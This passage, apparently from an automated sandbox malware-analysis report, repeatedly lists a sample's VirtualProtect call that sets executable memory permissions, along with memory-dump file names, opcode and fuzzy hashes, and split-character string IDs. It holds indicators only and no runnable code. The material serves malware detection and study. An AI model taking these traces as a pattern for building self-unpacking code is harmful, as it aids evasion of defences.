                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 799cf96d208df78444660078e2104325f2ee3c4a420d3db674c8bcb6f4dc4c4c
                                                                                                                                              • Instruction ID: 458d38c4ac4ac2e0a890c9bb8e4a9faea148a723fd4b00d52b4af6688bdf90c3
                                                                                                                                              • Opcode Fuzzy Hash: 799cf96d208df78444660078e2104325f2ee3c4a420d3db674c8bcb6f4dc4c4c
                                                                                                                                              • Instruction Fuzzy Hash: 4ED135E2D082649AF7208624EC447EB7A68EF51314F1440FED94DA62C1D6BE1FC6CB67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: f008ab9c7c818f81744ee77cf2c6e55b4ec4b83fb5e804deb6bf64c9298d7c23
                                                                                                                                              • Instruction ID: 59163a79f1e718bf8fdf548af5e6fdd436e52e4d132ed39006692e3f8e990f66
                                                                                                                                              • Opcode Fuzzy Hash: f008ab9c7c818f81744ee77cf2c6e55b4ec4b83fb5e804deb6bf64c9298d7c23
                                                                                                                                              • Instruction Fuzzy Hash: 36D147A2D042649AF7208624EC44BEB7A69DF51310F0440FED94DA72C1D6BE5FC6CB67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 26fbc9ab7792db71d7a3ca395d2d03866270531154e9b2181aac9bc8d78f0471
                                                                                                                                              • Instruction ID: 6c61b91d5ed829c07fb3eca1805c18e4c1d41d2c227a964cc652b6df1d4533f5
                                                                                                                                              • Opcode Fuzzy Hash: 26fbc9ab7792db71d7a3ca395d2d03866270531154e9b2181aac9bc8d78f0471
                                                                                                                                              • Instruction Fuzzy Hash: 51D135E2C082649AF7208624DC447EB7A69EF51314F1480FED94DA62C1D6BE1FC6CB67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 736f7411ec79d40dddd1db38831dba188a81169fb3a5d6ffb08c0fc51e07d7d1
                                                                                                                                              • Instruction ID: 283ebc008c54337029ad982e6338bed2757a0bab3e3c0bbaa6d50b25317a4fa5
                                                                                                                                              • Opcode Fuzzy Hash: 736f7411ec79d40dddd1db38831dba188a81169fb3a5d6ffb08c0fc51e07d7d1
                                                                                                                                              • Instruction Fuzzy Hash: C2D146B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA62C1DABE5FC6CB67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 9131158bdcb16dd5779c4a55038fec9e1f5f0dfb7f8ae4d7e15de7015695186a
                                                                                                                                              • Instruction ID: ea99530225736df8b548ebe2bae57b79cf499234a5dd8c7338e838a4a56707e2
                                                                                                                                              • Opcode Fuzzy Hash: 9131158bdcb16dd5779c4a55038fec9e1f5f0dfb7f8ae4d7e15de7015695186a
                                                                                                                                              • Instruction Fuzzy Hash: E5C135A2D082649AF7208624DC44BEB7A69DF51310F1440FED98D672C1DABE1FC68B67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: d3c42047d87a86d63d58d84b158be34b8d2acf367a4459959edbab65f2a6965e
                                                                                                                                              • Instruction ID: d7193199d5c040545e3c9022d1fc5edff3b9aaee513072e49c1cd987f5022490
                                                                                                                                              • Opcode Fuzzy Hash: d3c42047d87a86d63d58d84b158be34b8d2acf367a4459959edbab65f2a6965e
                                                                                                                                              • Instruction Fuzzy Hash: 99C147A2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC5CBA7
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 62b09ee9c9c43222daf5d7d729e72fa8f280d2fcb39bed247f37f672a20773e2
                                                                                                                                              • Instruction ID: 02ac1c241656fbca97fd14fc078b331ed1feb611b8351a98511c686d9a3b4722
                                                                                                                                              • Opcode Fuzzy Hash: 62b09ee9c9c43222daf5d7d729e72fa8f280d2fcb39bed247f37f672a20773e2
                                                                                                                                              • Instruction Fuzzy Hash: 6EC135B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE0FC68B67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 12615ee431bc97ba1e0813fb1d754cd120cf9c8348520ce4a5478a199e0d867e
                                                                                                                                              • Instruction ID: c66bbedd050fd74ef394c8872448b7775fcb60110f28595935eee93ec1a4977d
                                                                                                                                              • Opcode Fuzzy Hash: 12615ee431bc97ba1e0813fb1d754cd120cf9c8348520ce4a5478a199e0d867e
                                                                                                                                              • Instruction Fuzzy Hash: 4CC125B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC68B67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 77f6d390efb2074a9dcccaf55be6bcb51fde9afb9c1353f5910512e37f7c94ac
                                                                                                                                              • Instruction ID: 27de90576a5a983c8bb595c6caf4dd849db3fb230b9d96bcbd17ce429aaee787
                                                                                                                                              • Opcode Fuzzy Hash: 77f6d390efb2074a9dcccaf55be6bcb51fde9afb9c1353f5910512e37f7c94ac
                                                                                                                                              • Instruction Fuzzy Hash: 54C125A2D082649AF7208624DC447EB7A69EF51310F1440FED98D672C1DABE1FC58BA7
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: e670bb2e270d01d68748bfc768d3d097a6a5e55323208fb8fa46f209319c35cb
                                                                                                                                              • Instruction ID: 739206e10e5bbd3a87ea5bf69ee451f3fa2a1961f9d0f60c166b0e27f9f25d40
                                                                                                                                              • Opcode Fuzzy Hash: e670bb2e270d01d68748bfc768d3d097a6a5e55323208fb8fa46f209319c35cb
                                                                                                                                              • Instruction Fuzzy Hash: 72C136A2D082649AF7208624DC44BEB7A68DF51314F1440FED94DA72C1DABE1FC6CB67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 39b22dd4791b86b672102f70ec30b4cce7713b9ba6efc1b3cdc1461827cba0ab
                                                                                                                                              • Instruction ID: 3f89346d8a0091a78b3bd381845a04ed6bfbe6e677ca770093b5f7ced1ed0a00
                                                                                                                                              • Opcode Fuzzy Hash: 39b22dd4791b86b672102f70ec30b4cce7713b9ba6efc1b3cdc1461827cba0ab
                                                                                                                                              • Instruction Fuzzy Hash: 35C135B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC68B67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: cf541e64226296dde0f04c1dae3208fa3a1819e8189e5f36ca0d2be6f11d627c
                                                                                                                                              • Instruction ID: 2eaf220d0d019d4476795fcdad0f36ee08c7a98f075cd34990ffe1a67c0fd865
                                                                                                                                              • Opcode Fuzzy Hash: cf541e64226296dde0f04c1dae3208fa3a1819e8189e5f36ca0d2be6f11d627c
                                                                                                                                              • Instruction Fuzzy Hash: AAC127A2C082649AF7208624DC447EB7A68DF51314F1440FED94DA72C1DABE1FC6CBA7
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: c1b652991f57b4d51d9afdfe0ce1b521bfe89a5e91ad65749f707dbb660ceaf2
                                                                                                                                              • Instruction ID: eee95b753abb5236ba68af6bac4d2848ac6c00735159e87780bc59e9a7c006ba
                                                                                                                                              • Opcode Fuzzy Hash: c1b652991f57b4d51d9afdfe0ce1b521bfe89a5e91ad65749f707dbb660ceaf2
                                                                                                                                              • Instruction Fuzzy Hash: D9C134A2D042649AF7208624DC44BEB7A69DF51314F0440FED98D672C1DABE1FC68B67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 67509ac4e62c815589baa350d5fae777ee73be06b571ee8fc4c68fd4bd71ad68
                                                                                                                                              • Instruction ID: b87fff604113521d0e075d409872acac2f19840f2612352ddb19065799ca5343
                                                                                                                                              • Opcode Fuzzy Hash: 67509ac4e62c815589baa350d5fae777ee73be06b571ee8fc4c68fd4bd71ad68
                                                                                                                                              • Instruction Fuzzy Hash: 9EC137A2C082649AF7208624DC447EB7A69DF51314F1440FED94DA72C1DABE1FC6CB67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: a97721c17aed311aaa0913c21342f9e64ea72508fae81aa1c56ff57a7b0cf0b8
                                                                                                                                              • Instruction ID: c319c942094677a70afdbac739dc446af6ba709f5ac1e1e70e693c49bdc09623
                                                                                                                                              • Opcode Fuzzy Hash: a97721c17aed311aaa0913c21342f9e64ea72508fae81aa1c56ff57a7b0cf0b8
                                                                                                                                              • Instruction Fuzzy Hash: CEC124A2D082649AF7208624DC447EB7A69DF51310F1440FED98D672C1DABE0FC6CBA7
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 5d83786fcbbd1a376f8d13976f562422fa6cf704a8b3cf443a60f46201b176c3
                                                                                                                                              • Instruction ID: 9e595a24c9be7f7410a59fb938de830ddc10ba8880a9535f11e1221573845212
                                                                                                                                              • Opcode Fuzzy Hash: 5d83786fcbbd1a376f8d13976f562422fa6cf704a8b3cf443a60f46201b176c3
                                                                                                                                              • Instruction Fuzzy Hash: E5C136A2C082649AF7208624DC447EB7A68DF51310F1440FED98DA72C1DABE1FC6CB67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 4467e9f4c2d4e4537828d09e37f5eaea477485ba2b457bd53e0c0fd48335732b
                                                                                                                                              • Instruction ID: e61220c44efc44d8f35c04059808cad78e1aea9d5a9cba44ff91179e6e520261
                                                                                                                                              • Opcode Fuzzy Hash: 4467e9f4c2d4e4537828d09e37f5eaea477485ba2b457bd53e0c0fd48335732b
                                                                                                                                              • Instruction Fuzzy Hash: 2DC134A2D082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC5CB67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 0-3687113455
                                                                                                                                              • Opcode ID: ebb81f9b8675731f2a4ebe9f8b60e68014bc6d86446735dfd1b1c91826dd882e
                                                                                                                                              • Instruction ID: 3953e652c82acacf2376db354ccff2cc4dd553918c662f570162e4efd4c28474
                                                                                                                                              • Opcode Fuzzy Hash: ebb81f9b8675731f2a4ebe9f8b60e68014bc6d86446735dfd1b1c91826dd882e
                                                                                                                                              • Instruction Fuzzy Hash: F3B137A2C082A49AF7218624DC447EB7A69DF51314F1840FED98D672C1DABE0FC5CB67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 0-3687113455
                                                                                                                                              • Opcode ID: 2a159c55b41b2f413e0f49f0480d06678424549b87c771006e9ff6e0b7b40e23
                                                                                                                                              • Instruction ID: 28b33057099f83837c3dca2da08c3296219d264ada31e600d4e2ea29d100dc91
                                                                                                                                              • Opcode Fuzzy Hash: 2a159c55b41b2f413e0f49f0480d06678424549b87c771006e9ff6e0b7b40e23
                                                                                                                                              • Instruction Fuzzy Hash: 8FB147A2C082649AF7208224EC447EB7A69DF51314F1840FED98D672C1DABE0FC5CB67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 0-3687113455
                                                                                                                                              • Opcode ID: 8c499a1e6beeebcdf27e33fcb0cab51cc49d3740f675232e690da04a5c30b26b
                                                                                                                                              • Instruction ID: a4343995d422e425631eb120bb7ec65cd211a5358cfa88a02a89882b7cf93bfd
                                                                                                                                              • Opcode Fuzzy Hash: 8c499a1e6beeebcdf27e33fcb0cab51cc49d3740f675232e690da04a5c30b26b
                                                                                                                                              • Instruction Fuzzy Hash: EAA148A2C082A49AF7218224EC447E77A68DF51314F1440FED98D672C1DABE0FD5CB67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 0-3687113455
                                                                                                                                              • Opcode ID: 6943e5728bfdb4b1d2f9c41d8336dd066317e98731f9c5b6d46add078f964e5d
                                                                                                                                              • Instruction ID: 689ca2796c9c1840187c645857b675f83b57d09b1d29273d245ddddd8b1f55d8
                                                                                                                                              • Opcode Fuzzy Hash: 6943e5728bfdb4b1d2f9c41d8336dd066317e98731f9c5b6d46add078f964e5d
                                                                                                                                              • Instruction Fuzzy Hash: 15A136A2C082A49AF7218224DC447EB7A69DF51314F0440FED98D672C1DABE1FD5CB67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
